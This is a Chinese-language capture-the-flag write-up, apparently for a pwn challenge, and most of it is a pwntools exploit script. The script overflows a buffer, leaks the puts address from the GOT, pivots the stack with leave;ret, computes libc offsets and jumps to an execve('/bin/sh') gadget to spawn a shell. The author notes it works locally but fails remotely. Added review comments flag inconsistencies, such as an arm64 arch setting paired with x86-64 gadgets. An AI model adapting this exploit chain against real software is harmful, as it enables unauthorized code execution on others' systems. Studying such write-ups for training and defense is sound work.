前言
很揪心,一直想着用 dl_resolve 解决,不过好麻烦,不仅要读还要写,还需要泄露地址,不如 rop 简单。
而且了解到 libc 中 execve('/bin/sh\x00') 的操作,不过由于题目没有 setbuf,导致缓冲区就很乱,本地能通,远程却打不了。
代码
from pwn import*
import roputils
def attack_remote_rop2():
    """Writeup exploit script for the CTF binary ./main (pwntools, Python 2 API).

    Sequence as written: two raw sends leak the libc address of puts via its
    GOT entry, libc addresses are derived from hard-coded offsets, two more
    sends deliver the final payload, then the connection is handed to the user.
    Every step is a send followed by a fixed sleep, so statement order is
    load-bearing.  All addresses below are specific to this challenge binary
    and to the one libc build the offsets were taken from.
    Uses raw_input and str payloads, so it targets Python 2 pwntools.
    """
    # NOTE(review): arch is set to 'arm64', but the gadget names (pop rdi /
    # pop rsi) and the 0x4004xx PLT addresses below are x86-64-style — confirm
    # the intended arch.  p64() output is little-endian either way.
    context(arch='arm64', os='linux', endian='little', rename_corefiles=False)
    context.log_level = 'debug'
    context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
    # Local process only; this is the "local works" run the writeup describes.
    conn = process("./main")
    elf = ELF("./main")  # only used by the commented-out log line below
    # Fixed addresses from the challenge binary (presumably non-PIE, given the
    # constant 0x40xxxx / 0x6010xx values).
    control_ebp = 0x601060 + 0x100
    leave_ret = 0x40060F
    ret = 0x40061C  # assigned but never used below
    puts_plt = 0x4004C0
    puts_got = 0x601018
    read_plt = 0x4004d0  # assigned but never used below
    pop_rdi = 0x400693
    pop_rsi = 0x400691  # assigned but never used below
    read_again = 0x4005FC  # assigned but never used below
    # log.info('puts_got addr ==> 0x%x' % elf.got['puts'])
    # write bss
    # Blocks until Enter is pressed — presumably to attach a debugger first.
    raw_input("go?")
    # First send: 0x100 bytes of filler, then a chain that calls puts on the
    # puts GOT entry and continues at 0x4005C2.
    payload = 'a' * 0x100 + p64(pop_rdi) + \
        p64(puts_got) + p64(puts_plt) + p64(0x4005C2)
    conn.sendline(payload)
    sleep(0.1)  # fixed delay instead of waiting on output; fragile by design
    # write stack
    # Second send: overwrites the saved frame pointer with control_ebp - 8 and
    # returns into leave; ret, which moves execution onto the data sent above.
    payload = 'a' * 0xa + p64(control_ebp - 8) + p64(leave_ret)
    conn.sendline(payload)
    sleep(0.1)
    # Leak: read up to the 0x7f high byte, keep the last 6 bytes, zero-pad to
    # 8 so u64 can unpack the full 64-bit address.
    put_addr = u64((conn.recvuntil('\x7f')[-6:] + '\x00' * 2))
    log.info('put_addr addr ==> 0x%x' % put_addr)
    # libc base = leaked puts - 0x809c0; the three offsets are constants of one
    # libc build.  NOTE(review): a different libc on the remote side would also
    # explain "works locally, fails remotely", alongside the buffering issue
    # the writeup blames — worth confirming.
    system_addr = (put_addr - 0x809c0) + 0x4f440
    exec_addr = (put_addr - 0x809c0) + 0x4F322
    # Disassembly of the libc execve call site that exec_addr points at.
    # This is a bare string expression: no runtime effect.
    '''
text:000000000004F322 mov rax, cs:environ_ptr
text:000000000004F329 lea rdi, aBinSh ; "/bin/sh"
text:000000000004F330 lea rsi, [rsp+198h+var_158]
text:000000000004F335 mov cs:dword_3ED5E0, 0
text:000000000004F33F mov cs:dword_3ED5E4, 0
text:000000000004F349 mov rdx, [rax]
text:000000000004F34C call execve
'''
    # system_addr is only logged; the final payload uses exec_addr.
    log.info('system_addr addr ==> 0x%x' % system_addr)
    raw_input("go?")
    # write bss two
    conn.sendline('a' * 8)
    sleep(0.1)
    # write stack
    # Same layout as the second send, with the return target now exec_addr.
    payload = 'a' * 0xa + 'a' * 8 + p64(exec_addr)
    conn.sendline(payload)
    sleep(0.1)
    conn.interactive()
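# Script entry point.  The function defined above is attack_remote_rop2; the
# original call referenced attack_remote_dl, which is not defined in this file
# and would raise NameError before anything ran.
attack_remote_rop2()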
总结
-。-可还行